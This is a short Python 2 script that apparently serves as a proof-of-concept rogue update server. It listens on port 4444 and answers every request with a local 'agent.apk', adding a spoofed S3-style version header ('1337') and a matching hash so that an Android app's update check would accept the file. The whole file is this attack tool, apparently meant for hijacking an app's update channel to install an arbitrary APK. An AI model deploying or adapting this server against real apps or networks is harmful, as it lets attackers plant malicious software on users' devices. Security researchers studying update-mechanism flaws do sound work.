import hashlib

from BaseHTTPServer import BaseHTTPRequestHandler

APK_FILE = "agent.apk"
APK_DATA = open(APK_FILE,"rb").read()
APK_SIZE = str(len(APK_DATA))
APK_HASH = hashlib.md5(APK_DATA).hexdigest()

class MyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Length", APK_SIZE)
        self.send_header("ETag", APK_HASH)
        self.send_header("x-amz-meta-apk-version", "1337")
        self.end_headers()
        self.wfile.write(APK_DATA)
        return

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Length", APK_SIZE)
        self.send_header("ETag", APK_HASH)
        self.send_header("x-amz-meta-apk-version", "1337")
        self.end_headers()
        return

if __name__ == "__main__":
    from BaseHTTPServer import HTTPServer
    server = HTTPServer(('0.0.0.0',4444), MyHandler)
    server.serve_forever()
